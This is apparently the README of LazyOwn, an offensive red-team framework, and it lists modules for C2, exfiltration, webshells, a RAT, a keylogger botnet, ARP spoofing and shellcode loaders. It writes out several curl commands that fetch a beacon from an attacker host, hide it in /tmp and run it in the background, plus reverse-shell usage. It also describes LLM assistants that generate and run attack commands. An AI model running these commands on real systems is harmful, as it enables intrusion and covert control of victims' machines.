bloodyAD   lateral_mov_lin  regeorg          stormbreaker       wmiexec   
chisel     ligolo           rnc              targetedKerberoas  wmiexecpro
dcomexec   mssqlcli         set_proxychains  tord             
getTGT     nc               shadowsocks      upload_c2        
gospherus  ngrok            socat            vpn              

09. Data Exfiltration
─────────────────────
adgetpass    dploot    evilwinrm     getuserspns  reg_py    secretsdump  
decrypt      encrypt   getadusers    gitdumper    rsync     unzip        
download_c2  evidence  getnthash_py  gmsadumper   samdump2  upload_gofile

10. Command & Control
─────────────────────
atomic_agent  automsf     emp3r0r                mitre_test   sliver_server
atomic_gen    c2          empire                 msf        
atomic_tests  caldera     generate_playbook      msfrpc     
attack_plan   duckyspark  iis_webdav_upload_asp  my_playbook

11. Reporting
─────────────
apropos                  createtargets          gpt             process_scans
banners                  download_malwarebazar  groq            pth_net      
c2asm                    extract_ports          img2vid         pup          
camphish                 eyewitness             malwarebazar    vulns        
create_session_json      eyewitness_py          morse         
createjsonmachine        get_avaible_actions    name_the_hash 
createjsonmachine_batch  gowitness              nmapscripthelp

12. Miscellaneous
─────────────────
acknowledgearp   clone_site          getseclist        links         run      
acknowledgeicmp  cron                graph             list          sh       
addhosts         decode              h                 load_session  show     
aliass           download_resources  hex_to_plaintext  nano          sys      
assign           encode              ignorearp         news          tab      
banner           encoderpayload      ignoreicmp        payload       urldecode
base64decode     encodewinbase64     ip                pwd           urlencode
base64encode     exit                ip2asn            qa            v        
check_update     fixel               ip2hex            rhost       
clean            fixperm             kick              rot         
clock            gencert             lazyscript        rotf        

13. Lua Plugin
──────────────
generate_c_reverse_shell          lolbas_certutil_download_exec
generate_cleanup_commands         lolbas_certutil_exe          
generate_html_payload             lolbas_mshta_js              
generate_lateral_command          lolbas_mshta_reverse_shell   
generate_linux_asm_reverse_shell  lolbas_rundll32_dll          
generate_linux_raw_shellcode      lolbas_wmic_xsl_execution    
generate_lolbird                  parse_nmap_with_xmlstarlet   
generate_msfvenom_loader          run_nuclei_on_nmap_files     
generate_msfvenom_loader_windows  run_python_rev_c2            
generate_reverse_shell            rundll32_sct_from_url        
generate_stub                     validate_shellcode           
kerberos_harvest                  visualize_network            
lolbas_bitsadmin_exe            

14. Yaml Addon.
───────────────
AdaptixC2                 GoPEInjection      OverRide
agentzero                 gosearch           peeko
argfuscator               gui                pretender
ATTPwn                    gui2               PTMultiTools
AuroraPatch               hack_browser_data  PTMultiTools_scan
banner_tool               hellbird           PyinMemoryPE
bbr                       hive               pyrit
beacon                    hooka_linux_amd64  raven
blacksandbeacon           hostdiscover       ridenum
blacksandbeacon_bof       kivi_revshell      setoolkit
cgoblin_windows           laps               ShadowLink
Clematis                  lazyaddon_creator  shellcode_custom_win_rev_tcp_xored
commix2                   lazyagentAi        SigPloit
copy-fail-CVE-2026-31431  lazybinenc         spoonmap
CVE-2022-22077            lazyftpsniff       stratus_detonate
CVE_2025_24071_PoC        LazyLoader         stratus_list
demiguise                 lazymapd           toposwarm
ebird3                    lazyownbt          unicorn
evilginx2                 LazyOwnExplorer    upxdump
gcr                       llm                vulnbot
gemini-cli                NullGate           vulnbot_groq
gen_dll_rev               oniux              vulnhuntr
Get_ReverseShell          opencode_adapter   watchguard
githubot                  orpheus            wspcoerce
gomulti_loader_linux
gomulti_loader_windows

15. Adversary YAML.
───────────────────
amsi_c            implant_nim_nim  infect_c     pid_c  
implant_crypt_go  implant_rust_rs  persist_ps1  shell_c

16. Artificial Intelligence
───────────────────────────
ai_toggle

Uncategorized Commands
──────────────────────
addalias          gobuster_dns   ipy             ollama_enum   set          
alias             gobuster_http  listaliases     pop           shell        
edit              gobuster_web   macro           quit          shortcuts    
EOF               help           nikto_host      rrhost        subwfuzz_tool
ffuf_enumeration  history        notify          run_pyscript
ffuf_tool         ipp            nuclei_ad_http  run_script  

┌─[👤grisun0 (LazyOwn👽kali) ~/home/grisun0/LazyOwn][127.0.0.1][http://VariaType.htb] 🌐192.168.1.120 ✗ feature/lazyllmchat-assistant (🐍env)
└╼ $ 


Тег в YouTube

https://www.youtube.com/hashtag/lazyown

Подкаст

https://www.youtube.com/watch?v=m4FtlhownvM&list=PLW9Qe5HJK5CFXyIsF9b0NB6n9EY8Am3YZ

DeepWiki

https://deepwiki.com/grisuno/LazyOwn/

LazyOwn> assign binary_name my_binary
LazyOwn> assign rhost 192.168.1.100
LazyOwn> assign api_key my_api_key
LazyOwn> run lazysearch
LazyOwn> run lazynmap
LazyOwn> exit

image

Для поиска по базе данных, полученной из GTFOBins.

python3 lazysearch.py binario_a_buscar

Поиск с графическим интерфейсом

Дополнительные функции и улучшения: AutocompleteEntry:

Добавлен фильтр для удаления значений None из списка автозаполнения. Новый вектор атаки:

В основной интерфейс добавлена кнопка «Новый вектор атаки». Реализована функциональность для добавления нового вектора атаки и сохранения обновленных данных в файлах Parquet. Экспорт в CSV:

В основной интерфейс добавлена кнопка «Экспорт в CSV». Реализована функциональность экспорта данных DataFrame в выбранный пользователем CSV-файл. Использование:

Добавить новый вектор атаки: нажмите кнопку «Новый вектор атаки», заполните поля и сохраните. Экспорт в CSV: нажмите кнопку «Экспорт в CSV» и выберите место для сохранения CSV-файла. Новая функция scan_system_for_binaries:

Реализует поиск бинарных файлов по всей системе с помощью команды file для определения, является ли файл бинарным. Использует os.walk для обхода файловой системы. Результаты отображаются в новом окне внутри графического интерфейса. Кнопка для поиска бинарных файлов:

В основной интерфейс добавлена кнопка «Поиск бинарных файлов в системе», которая вызывает функцию scan_system_for_binaries. Примечание:

Функция is_binary использует команду file из Unix для определения, является ли файл исполняемым бинарным. Если вы используете другую операционную систему, вам потребуется адаптировать этот метод для совместимости. Эта реализация может быть ресурсоемкой, так как она обходит всю файловую систему. Вы можете рассмотреть возможность добавления дополнительных опций для ограничения поиска определенными каталогами или фильтрации по типам файлов.

python3 LazyOwnExplorer.py

image

python3 lazyown.py

Если вы хотите обновиться, действуем следующим образом:

cd LazyOwn
rm parquets/*.csv
rm parquets/*.parquet
./update_db.sh

Использование режима LazyOwn WebShells

Коллекция LazyOwn Webshell — это набор веб-шеллов для нашего фреймворка, который позволяет нам установить веб-шелл на машине, где мы запускаем LazyOwn, с использованием различных языков программирования. По сути, LazyOwn Webshell поднимает веб-сервер в каталоге модулей, делая его доступным через веб-браузер. Это позволяет нам как предоставлять модули отдельно через веб, так и получать доступ к каталогу cgi-bin, где находятся четыре шелла: один на Bash, другой на Perl, третий на Python и один на ASP, на случай, если целевая машина работает под управлением Windows.

lazywebshell

и всё, теперь мы можем получить доступ к любому из этих URL:

http://localhost:8080/cgi-bin/lazywebshell.sh

http://localhost:8080/cgi-bin/lazywebshell.py

http://localhost:8080/cgi-bin/lazywebshell.asp

http://localhost:8080/cgi-bin/lazywebshell.cgi

image

Использование Lazy MSFVenom для Reverse Shell

Выполняет инструмент `msfvenom` для генерации различных полезных нагрузок на основе пользовательского ввода.

Эта функция запрашивает у пользователя выбор типа полезной нагрузки из предопределенного списка и запускает соответствующую
команду `msfvenom` для создания желаемой полезной нагрузки. Она обрабатывает такие задачи, как генерация различных типов
полезных нагрузок для систем Linux, Windows, macOS и Android, включая необязательное кодирование с помощью Shikata Ga Nai для C-полезных нагрузок.

Сгенерированные полезные нагрузки перемещаются в каталог `sessions`, где устанавливаются соответствующие разрешения. Кроме того,
полезные нагрузки могут быть сжаты с помощью UPX для экономии места. Если выбранная полезная нагрузка является Android APK,
функция также подпишет APK и выполнит необходимые шаги постобработки.

:param line: Аргументы командной строки для скрипта.
:return: None
run lazymsfvenom or venom

Система Command & Control

Система Command & Control (C2) обеспечивает удаленные операции через архитектуру клиент-сервер с шифрованной связью.

image

Использование Lazy PATH Hijacking

В /tmp будет создан файл с именем binary_name, указанным в полезной нагрузке, инициализированный с помощью gzip в памяти и использующий bash в полезной нагрузке. Чтобы задать полезную нагрузку из JSON, используйте команду payload для выполнения. Используйте:

lazypathhijacking

Использование режима LazyOwn RAT

image

LazyOwn RAT — это простой, но мощный инструмент удаленного администрирования. Он включает функцию создания скриншотов, которая захватывает экран сервера, команду загрузки, которая позволяет нам загружать файлы на скомпрометированную машину, и режим C&C, в котором команды могут отправляться на сервер. Он работает в двух режимах: режим клиента и режим сервера. Здесь нет обфускации, и RAT основан на BasicRat. Вы можете найти его на GitHub по адресу https://github.com/awesome-security/basicRAT и на https://github.com/hash3liZer/SillyRAT. Хотя последний гораздо более полный, я просто хотел реализовать захват скриншотов, загрузку файлов и отправку команд. Возможно, в будущем я добавлю функцию просмотра веб-камеры, но это будет позже.

usage: lazyownserver.py [-h] [--host HOST] [--port PORT] --key KEY
lazyownserver.py: error: the following arguments are required: --key

usage: lazyownclient.py [-h] --host HOST --port PORT --key KEY
lazyownclient.py: error: the following arguments are required: --host, --port, --key

LazyOwn> run lazyownclient
[?] lhost and lport and rat_key must be set

LazyOwn> run lazyownserver
[?] rhost and lport and rat_key must be set

luego los comandos son:

upload /path/to/file
donwload /path/to/file
screenshot
sysinfo
fix_xauth #to fix xauth xD
lazyownreverse 192.168.1.100 8888 #Reverse shell to 192.168.1.100 on port 8888 ready to C&C

image

Использование режима Lazy Meta Extract0r

LazyMeta Extract0r — это инструмент, предназначенный для извлечения метаданных из различных типов файлов, включая PDF, DOCX, OLE-файлы (такие как DOC и XLS) и несколько форматов изображений (JPG, JPEG, TIFF). Этот инструмент будет проходить по указанному каталогу, искать файлы с совместимыми расширениями, извлекать метаданные и сохранять их в выходной файл.

[*] Запуск: LazyMeta extract0r [;,;]

usage: lazyown_metaextract0r.py [-h] --path PATH lazyown_metaextract0r.py: ошибка: требуются следующие аргументы: --path

python3 lazyown_metaextract0r.py --path /home/user

image

Использование режима decrypt encrypt

A encryption method that allows us to both encrypt files and decrypt them if we have the key, of course.

Captura de pantalla 2024-06-08 231900

encrypt path/to/file key # to encrypt
decrypt path/to/file.enc key #to decrypt

Uso modo LazyNmap

image

The use of Lazynmap provides us with an automated script for a target, in this case, 127.0.0.1, using Nmap. The script requires administrative permissions via sudo. It also includes a network discovery module to identify what is present in the IP segment you are in. Additionally, the script can now be called without parameters using the alias nmap or with the command run lazynmap.

image

./lazynmap.sh -t 127.0.0.1 # or in the cli just nmap

Usage of LazyOwn GPT One Liner CLI Assistant and Researcher

Discover the revolution in automating pentesting tasks with the LazyOwn GPT One Liner CLI Assistant! This incredible script is part of the LazyOwn tool suite, designed to make your life as a pentester more efficient and productive.

Key Features:

Intelligent Automation: Leverages the power of Groq and advanced natural language models to generate precise and efficient commands based on your specific needs. User-Friendly Interface: With a simple prompt, the assistant generates and executes one-liner scripts, drastically reducing the time and effort involved in creating complex commands. Continuous Improvement: Continuously transforms and optimizes its knowledge base to provide you with the best solutions, adapting to each situation. Simplified Debugging: Enable debug mode to obtain detailed information at every step, facilitating the identification and correction of errors. Seamless Integration: Works effortlessly within your workspace, harnessing the power of the Groq API to deliver quick and accurate responses. Security and Control:

Safe Error Handling: Intelligently detects and responds to execution errors, ensuring you maintain full control over each generated command. Controlled Execution: Before executing any command, it requests your confirmation, giving you peace of mind knowing exactly what is being executed on your system. Easy Configuration:

Set up your API key in seconds and start enjoying all the benefits offered by the LazyOwn GPT One Liner CLI Assistant. A quick start guide is available to help you configure and maximize the potential of this powerful tool.

Ideal for Pentesters and Developers:

Optimize Your Processes: Simplify and accelerate command generation in your security audits. Continuous Learning: The knowledge base is constantly updated and improved, always providing you with the latest best practices and solutions. With the LazyOwn GPT One Liner CLI Assistant, transform the way you work, making it faster, more efficient, and secure. Stop wasting time on repetitive and complex tasks, and focus on what truly matters: discovering and resolving vulnerabilities!

Join the pentesting revolution with LazyOwn and take your productivity to the next level!

[?] Usage: python lazygptcli.py --prompt "" [--debug]

[?] Options:

--prompt "The prompt for the programming task (required)." --debug, -d "Enables debug mode to display debug messages." --transform "Transforms the original knowledge base into an enhanced base using Groq." [?] Ensure you configure your API key before running the script: export GROQ_API_KEY= [->] Visit: https://console.groq.com/docs/quickstart (not a sponsored link)

Requirements:

Python 3.x A valid Groq API key Steps to Obtain the Groq API Key: Visit Groq Console (https://console.groq.com/docs/quickstart) to register and obtain an API key.

export GROQ_API_KEY=<tu_api_key>
python3 lazygptcli.py --prompt "<tu prompt>" [--debug]

image

Usage of lazyown_bprfuzzer.py

Provide the arguments as specified by the script's requests: The script will require the following arguments:

usage: lazyown_bprfuzzer.py [-h] --url URL [--method METHOD] [--headers HEADERS] [--params PARAMS] [--data DATA] [--json_data JSON_DATA] [--proxy_port PROXY_PORT] [-w WORDLIST] [-hc HIDE_CODE] --url: The URL to which the request will be sent (required). --method: The HTTP method to use, such as GET or POST (optional, default: GET). --headers: The request headers in JSON format (optional, default: {}).

--params: Параметры URL в формате JSON (необязательно, по умолчанию: {}). --data: Данные формы в формате JSON (необязательно, по умолчанию: {}). --json_data: JSON-данные для запроса в формате JSON (необязательно, по умолчанию: {}). --proxy_port: Порт для внутреннего прокси (необязательно, по умолчанию: 8080). -w, --wordlist: Путь к словарю для режима фаззинга (необязательно). -hc, --hide_code: HTTP-код состояния, который нужно скрыть в выводе (необязательно). Убедитесь, что вы предоставили необходимые аргументы, чтобы скрипт работал корректно.

python3 lazyown_bprfuzzer.py --url "http://example.com" --method POST --headers '{"Content-Type": "LAZYFUZZ"}'

Форма 2: Расширенное использование

Если вы хотите воспользоваться расширенными возможностями скрипта, такими как повтор запроса или фаззинг, выполните следующие шаги:

Повтор запроса:

Чтобы использовать функцию повтора запроса, укажите аргументы, как было описано ранее. Во время выполнения скрипт спросит, хотите ли вы повторить запрос. Введите 'y' для повтора или 'n' для завершения повторителя. Фаззинг:

Чтобы использовать функцию фаззинга, обязательно укажите словарь с помощью аргумента -w или --wordlist. Скрипт заменит слово LAZYFUZZ в URL и других данных на слова из предоставленного словаря. Во время выполнения скрипт будет отображать результаты каждой итерации фаззинга. Это основные и расширенные способы использования скрипта lazyburp.py. В зависимости от ваших потребностей вы можете выбрать метод, который лучше всего подходит для вашей конкретной ситуации.

python3 lazyown_bprfuzzer.py \                                                                                                           ─╯
    --url "http://127.0.0.1:80/LAZYFUZZ" \
    --method POST \
    --headers '{"User-Agent": "LAZYFUZZ"}' \
    --params '{"param1": "value1", "param2": "LAZYFUZZ"}' \
    --data '{"key1": "LAZYFUZZ", "key2": "value2"}' \
    --json_data '{"key3": "LAZYFUZZ"}' \
    --proxy_port 8080 \
    -w /usr/share/seclist/SecLists-master/Discovery/Variables/awesome-environment-variable-names.txt \
    -hc 501
python3 lazyown_bprfuzzer.py \                                                                                                           ─╯
    --url "http://127.0.0.1:80/LAZYFUZZ" \
    --method POST \
    --headers '{"User-Agent": "LAZYFUZZ"}' \
    --params '{"param1": "value1", "param2": "LAZYFUZZ"}' \
    --data '{"key1": "LAZYFUZZ", "key2": "value2"}' \
    --json_data '{"key3": "LAZYFUZZ"}' \
    --proxy_port 8080 \
    -w /usr/share/seclist/SecLists-master/Discovery/Variables/awesome-environment-variable-names.txt \

image Примечание: Чтобы использовать словарь, выполните следующую команду в /usr/share/seclists:

now the command 'getseclist' do that automated.
wget -c https://github.com/danielmiessler/SecLists/archive/master.zip -O SecList.zip \
&& unzip SecList.zip \
&& rm -f SecList.zip

Использование режима LazyOwn FTP Sniff

Этот модуль используется для поиска паролей на FTP-серверах в сети. Некоторые могут сказать, что FTP больше не используется, но вы бы удивились, сколько критически важных инфраструктурных сред я видел с массовыми FTP-сервисами, работающими на их серверах. :)

assign device eth0
run lazyftpsniff

image

Использование режима LazyReverseShell

Прослушивание

nc -nlvp 1337 #o el puerto que escojamos

image

затем на машине жертвы

./lazyreverse_shell.sh --ip 127.0.0.1 --puerto 1337

image

Использование режима Lazy Curl для разведки

Модуль находится в каталоге modules и используется следующим образом:

chmod +x lazycurl.sh

и затем

./lazycurl.sh --mode GET --url http://10.10.10.10

Использование.

GET:

./lazycurl.sh --mode GET --url http://10.10.10.10

POST:

./lazycurl.sh --mode POST --url http://10.10.10.10 --data "param1=value1&param2=value2"

TRACE:

./lazycurl.sh --mode TRACE --url http://10.10.10.10
```sh

File upload:

```sh
./lazycurl.sh --mode UPLOAD --url http://10.10.10.10 --file file.txt

режим перебора по словарю:

./lazycurl.sh --mode BRUTE_FORCE --url http://10.10.10.10 --wordlist /usr/share/wordlists/rockyou.txt

Убедитесь, что вы настроили параметры в соответствии с вашими потребностями и что значения, которые вы предоставляете для опций, действительны для каждого случая.

Использование режима ARPSpoofing

Скрипт предоставляет атаку ARP-спуфинга с использованием Scapy. В полезной нагрузке вы должны указать lhost, rhost и устройство, которое будете использовать для выполнения ARP-спуфинга.

assign rhost 192.168.1.100
assign lhost 192.168.1.1
assign device eth0
run lazyarpspoofing

Использование режима LazyGathering

Этот скрипт предоставляет рентгеновское представление системы, на которой выполняется инструмент, предлагая понимание её конфигурации и состояния.

image

run lazygath

Использование режима Lazy Own LFI RFI 2 RCE

Режим LFI RFI 2 RCE предназначен для тестирования некоторых из наиболее известных полезных нагрузок против параметров, указанных в payload.json. Это позволяет провести всестороннюю оценку уязвимостей локального включения файлов (LFI), удаленного включения файлов (RFI) и удаленного выполнения кода (RCE) в целевой системе.

image

payload
run lazylfi2rce

Использование режима LazyOwn Sniffer

https://www.youtube.com/watch?v=_-DDiiMrIlE

Режим сниффера позволяет захватывать сетевой трафик через интерфейсы с помощью опции -i, которая является обязательной. Есть много других дополнительных настроек, которые можно регулировать по мере необходимости.

Использование

usage: lazysniff.py [-h] -i INTERFACE [-c COUNT] [-f FILTER] [-p PCAP]
lazysniff.py: error: the following arguments are required: -i/--interface


![Captura de pantalla 2024-06-05 031231](https://github.com/grisuno/LazyOwn/assets/1097185/db1e05a0-026e-414f-9ec6-0a9ef2cb06fe)

To use the sniffer from the framework, you must configure the device with the command:

```sh
run lazysniff
or just
sniff

Экспериментальная обфускация с использованием PyInstaller

Эта функция находится в экспериментальном режиме и не работает полностью из-за проблемы с путями. Вскоре она будет поддерживать обфускацию с использованием PyInstaller.

./py2el.sh

Экспериментальный эксплойт NetBIOS

Эта функция находится в экспериментальном режиме, так как она ещё не работает... (скоро появится, возможно, реализация EternalBlue и другие вещи...)

run lazynetbios

Экспериментальный LazyBotNet с кейлоггером для Windows и Linux

Эта функция находится в экспериментальном режиме, и расшифровка журналов кейлоггера не работает xD. Здесь мы впервые видим в действии команду payload, которая задает всю конфигурацию в нашем payload.json, позволяя нам предварительно загрузить конфигурацию перед запуском фреймворка.

payload
run lazybotnet

Интерактивные меню

Скрипт имеет интерактивные меню для выбора выполняемых действий. В режиме сервера он отображает соответствующие опции для машины-жертвы, а в режиме клиента — опции, относящиеся к атакующей машине.

Чистое прерывание

Скрипт обрабатывает сигнал SIGINT (обычно генерируемый Control + C) для чистого выхода.

Лицензия

Этот проект лицензирован под лицензией GPL v3. Информация, содержащаяся в GTFOBins, принадлежит ее авторам, которым мы чрезвычайно благодарны за предоставленную информацию.

Благодарности ✌

Особая благодарность GTFOBins за ценную информацию, которую они предоставляют, и вам за использование этого проекта. Также спасибо за вашу поддержку Tito S4vitar! который проделывает невероятную работу по распространению информации. Конечно, я использую функцию extractPorts в моем .zshrc :D, спасибо deepwiki за помощь с документацией. ( https://deepwiki.com/grisuno/LazyOwn/ ), спасибо plaintext, который проделывает невероятную работу по распространению информации, и мы приняли PTMultiTools, это очень впечатляюще.

Спасибо pwntomate 🍅

Отличный инструмент, который я немного адаптировал для работы с проектом; все заслуги принадлежат его автору honze-net Андреасу Хонциа. Посетите и поддержите проект: https://github.com/honze-net/pwntomate

Спасибо Sicat 🐈

Отличный инструмент для обнаружения CVE, я реализовал только поиск по ключевым словам, так как мне пришлось изменить некоторые библиотеки. Скоро также для XML, генерируемого nmap :) Огромное спасибо justakazh. https://github.com/justakazh/sicat/

Спасибо josefcohernandez

За выявление и сообщение о сбоях сборки Docker, вызванных сбоем repo.charm.sh и несовместимостью версий Python. Его отчет привел к исправлениям в lazyown-docker/Dockerfile.

Спасибо EQSTLab (через yym8538)

За два критических предупреждения безопасности, которые помогли нам укрепить фреймворк и исправить серьезные уязвимости. Их ответственное раскрытие делает LazyOwn безопаснее для всего сообщества.

BlackSandBeacon — Linux BOF

BlackSandBeacon впервые привносит расширяемость Beacon Object File (BOF) в Linux в рамках фреймворка с открытым исходным кодом C2. Ни один коммерческий C2 (включая Cobalt Strike) не предлагает поддержку Linux BOF.

Что такое Linux BOF?

В Windows BOF — это позиционно-независимые объекты PE COFF, загружаемые beacon во время выполнения, что дает операторам систему плагинов в памяти без запуска новых процессов. BlackSandBeacon переносит эту модель на Linux:

  • BOF компилируются как позиционно-независимые разделяемые объекты ELF (.so) с помощью GCC (-shared -fPIC -nostartfiles).
  • Beacon загружает их во время выполнения через dlopen — без записи на диск после доставки, без нового процесса, без оболочки.
  • API datap (BeaconDataParse, BeaconDataInt, BeaconDataExtract, BeaconPrintf, BeaconOutput) совместим с исходным кодом контракта Windows BOF, поэтому существующие авторы BOF могут портировать, заменяя вызовы Win32 на системные вызовы Linux или эквиваленты libc.
  • Продвинутые BOF могут использовать прямые системные вызовы через встроенную сборку или io_uring для взаимодействия с ядром без связывания с libc.

Развертывание через LazyOwn

# 1. Build and stage the beacon
(LazyOwn) > blacksandbeacon

# 2. Deliver to target (command runs on target)
curl -sk "http://{lhost}:{lport}/blacksandbeacon" -o /tmp/.svc && chmod +x /tmp/.svc && /tmp/.svc &

# 3. Build and stage the BOF loader
(LazyOwn) > blacksandbeacon_bof

# 4. Deliver the BOF loader to a live session
curl -sk "http://{lhost}:{lport}/bof_loader" -o /tmp/.bof && chmod +x /tmp/.bof && /tmp/.bof

Портирование Windows BOF в Linux

// Replace Win32 API calls with direct syscalls or libc equivalents.
// The datap API remains identical.
#include "beacon.h"

void go(char *args, int len) {
    datap parser;
    BeaconDataParse(&parser, args, len);
    char *target = BeaconDataExtract(&parser, NULL);
    // Linux: use syscall(SYS_open, ...) instead of CreateFile
    BeaconPrintf(CALLBACK_OUTPUT, "target: %s\n", target);
}

Компиляция: gcc -shared -fPIC -nostartfiles -o mybof.so mybof.c

Закрываемый пробел в внедрении

Возможность Cobalt Strike Sliver Havoc LazyOwn + BlackSandBeacon
Windows BOF Да Нет Нет Да (через аддон beacon)
Linux BOF Нет Нет Нет Да
ARM BOF Нет Нет Нет Планируется (blackzincbeacon)
Открытый исходный код Нет Да Да Да

Связанные проекты

LazyOwn поставляется как «все-в-одном» фронтенд небольшой экосистемы специализированных инструментов для red-team. Каждый проект ниже самостоятелен и может быть интегрирован в LazyOwn через lazyaddons/*.yaml, конвейер имплантов C2 или представление MCP lazyown_palette --info (которое показывает соседей calls и related, полученных из graphify, для каждой команды).

Легковесные beacon (C / ASM)

Готовые замены встроенного Go beacon, когда вам нужен меньший размер или артефакты для конкретной архитектуры: - beacon — минималистичный Windows-бикон на C с поддержкой BOF через инъекцию APC Early Bird и вызовы NT Native API. Сочетается с изменяемым профилем C2 LazyOwn. Подключается через lazyaddons/beacon.yaml. - blacksandbeacon — нативный Linux-бикон на C с первоклассной поддержкой Linux BOF (Beacon Object File) через инъекцию общих объектов ELF и прямые системные вызовы. BOF загружаются во время выполнения через среду выполнения dlopen — та же модель расширяемости, что и Windows BOF, но нацеленная на внутренности ядра Linux. Ни один коммерческий C2-фреймворк (включая Cobalt Strike) не предлагает поддержку Linux BOF. Подключается через lazyaddons/blacksandbeacon.yaml; загрузчик BOF через lazyaddons/blacksandbeacon_bof.yaml. - blackzincbeacon — ARM-сборка того же семейства для встраиваемых / IoT-задач.

Легковесные C2-фреймворки

Альтернативные C2-поверхности, которые говорят на том же beacon-протоколе, что и lazyc2.py, или могут служить серверной частью teamserver:

  • BlackObsidianC2 — небольшой быстрый Go C2-сервер, предназначенный как урезанный компаньон для lazyc2.py.
  • LazyOwnBT — Bluetooth / C2 PoC с учетом близости; полезен, когда область взаимодействия явно охватывает RF.

ИИ / оркестрация

Встраивается в LazyOwn через MCP, lazyaddon toposwarm или напрямую:

  • toposwarm — маршрутизатор на естественном языке поверх каталога команд LazyOwn; поставляется как lazyaddon и как навык Claude Code.
  • LazyOwnOpenCodeAdapter — мост между LazyOwn и агентами кодирования в стиле OpenCode.

Загрузчики, раннеры шеллкода и пост-эксплуатация

Используется как людьми через файлы .tool pwntomate, так и автономным демоном, когда реактивный селектор рекомендует технику в памяти:

  • gomulti_loader — многоплатформенный Go-загрузчик шеллкода (Linux + Windows). Подключается через lazyaddons/gomulti_loader_linux.yaml и gomulti_loader_windows.yaml.
  • win_shellcode — коллекция шаблонов Windows shellcode, готовых для связывания из заглушки beacon.
  • ejecutarShellcode — минимальные загрузчики «выполни этот шеллкод» для быстрых PoC.
  • ShellcodeFluctuation_crosscompile — кросскомпилируемый порт трюка ShellcodeFluctuation с шифрованием памяти.
  • LazyLoader — универсальный каркас загрузчика, предназначенный для расширения под каждую задачу.
  • OverRide — инструментарий для перехвата DLL / переопределения порядка поиска DLL для устойчивости Windows.
  • ShadowLink — инструменты для перезаписи ссылок / символов для Linux ELF-стейджеров.
  • netsh_helper_dll — шаблон устойчивости с помощью вспомогательной DLL netsh для Windows.

Обход защитных механизмов / инструментирование

  • amsi — исследования и PoC обхода AMSI; вызывается из полезных нагрузок LazyOwn, когда ограничивающим фактором является AV/EDR.

Эксплойты и CVE PoC

LazyOwn уже поставляет несколько недавних PoC класса ядра через систему аддонов (lazyaddons/copyfail.yaml, lazyaddons/dirtyfrag.yaml, lazyaddons/CVE-2022-22077.yaml, lazyaddons/CVE_2025_24071_PoC.yaml, lazyaddons/ebird3.yaml). Оригинальные репозитории перечислены здесь для проверяемости и цитирования:

  • CVE-2022-22077 — RTCore64.sys произвольный R/W IOCTL — используется в цепочке BYOVD LazyOwn.
  • copy-fail-CVE-2026-31431 — вариант Dirty Pipe следующего поколения. Поддерживается lazyaddon copyfail.
  • ebird3 — инъекция Early-Bird APC + загрузчик NT Native API; создает скрытые полезные нагрузки Windows в памяти.

Хотите добавить свой? Поместите lazyaddons/<name>.yaml с описанием repo_url, install_command и execute_command; LazyOwn подхватит его автоматически и отобразит через представление MCP lazyown_palette.

Аннотация

LazyOwn — это фреймворк, который оптимизирует свой рабочий процесс и автоматизирует множество задач и тестов с помощью алиасов и различных инструментов, работая как швейцарский нож с многоцелевыми лезвиями для взлома xD.

Lazyducky_digispark

LazyOwn

  Компилирует и загружает скетч .ino на устройство Digispark с помощью Arduino CLI и Micronucleus.

    Этот метод проверяет, установлены ли Arduino CLI и Micronucleus в системе.
    Если они недоступны, он устанавливает их. Затем он компилирует скетч Digispark
    и загружает сгенерированный .hex-файл на устройство Digispark.

    Метод выполняет следующие действия:
    1. Проверяет наличие Arduino CLI и устанавливает его, если он недоступен.
    2. Настраивает Arduino CLI для Digispark, если он ещё не настроен.
    3. Генерирует полезную нагрузку reverse shell и подготавливает скетч для Digispark.
    4. Компилирует подготовленный скетч Digispark с помощью Arduino CLI.
    5. Проверяет наличие Micronucleus и устанавливает его, если он недоступен.
    6. Загружает скомпилированный .hex-файл на устройство Digispark с помощью Micronucleus.

    Аргументы:
        line (str): Ввод командной строки, предоставленный пользователем, который может содержать дополнительные параметры.

    Возвращает:
        None: Функция не возвращает никакого значения, но может изменять состояние системы
            путем выполнения команд.

История звёзд

Star History Chart

Документация от readmeneitor.py

Документация автоматически создается скриптом readmeneitor.py, созданным для этого проекта; возможно, когда-нибудь у него будет собственный репозиторий, но пока я не вижу в этом необходимости.

Теперь у ReadMenator есть репозиторий

https://github.com/grisuno/ReadMenator

Юридическое предупреждение:

Использование LazyOwn RedTeam Framework для атаки на цели без предварительного взаимного согласия незаконно. Ответственность за соблюдение всех применимых местных, государственных и федеральных законов лежит на конечном пользователе. Разработчики не несут ответственности и не отвечают за любое неправильное использование или ущерб, причиненный этой программой. Используйте только в образовательных целях.


Справочник команд LazyOwn

Автоматически сгенерировано readmeneitor.py из исходных docstrings и cli/command_index.json.

Содержание


01. Разведка

alterx

Фаза: разведка | Источник: cli/commands/recon_migrated.py

Выполняет команду 'alterx' для перечисления поддоменов на указанном self.params['domain']. Если 'alterx'

apache_users

Фаза: разведка | Источник: cli/commands/recon_migrated.py

Выполняет перечисление пользователей целевой системы с помощью apache-users.

binarycheck

Фаза: разведка | Источник: cli/commands/recon_migrated.py

Выполняет различные проверки выбранного бинарного файла для сбора информации и защиты.

cve

Фаза: разведка | Источник: cli/commands/recon_migrated.py

Поиск CVE с использованием API CIRCL.

dig

Фаза: разведка | Источник: cli/commands/recon.py

Выполняет команду dig для запроса DNS-информации.

dnschef

Фаза: разведка | Источник: cli/commands/recon_migrated.py

Выполняет команду dnschef для запроса DNS-информации. Выполняет инструмент DNSChef для мониторинга DNS-запросов и перехвата ответов.

dnsenum

Фаза: разведка | Источник: cli/commands/recon.py

Выполняет перечисление DNS с помощью dnsenum для определения поддоменов заданного домена.

dnsmap

Фаза: разведка | Источник: cli/commands/recon.py

Выполняет перечисление DNS с помощью dnsmap для обнаружения поддоменов указанного домена.

dnstool_py

Фаза: разведка | Источник: cli/commands/recon_migrated.py

Выполняет инструмент dnstool.py для изменения DNS-записей, интегрированных с Active Directory.

estorides_import

Фаза: разведка | Источник: cli/commands/estorides.py

Импортирует объекты, обнаруженные Estorides, в базу данных и область действия LazyOwn.

estorides_loop

Фаза: разведка | Источник: cli/commands/estorides.py

Запускает двунаправленный цикл обратной связи Estorides <-> LazyOwn.

estorides_seed

Фаза: разведка | Источник: cli/commands/estorides.py

Передает хосты/домены LazyOwn в Estorides для пассивного OSINT-обнаружения.

estorides_surface

Фаза: разведка | Источник: cli/commands/estorides.py

Показывает комбинированную активную + пассивную поверхность атаки.

finalrecon

Фаза: разведка | Источник: cli/commands/recon.py

Запускает инструмент finalrecon для выполнения сканирования уязвимостей веб-сервера по указанному целевому хосту.

getcap

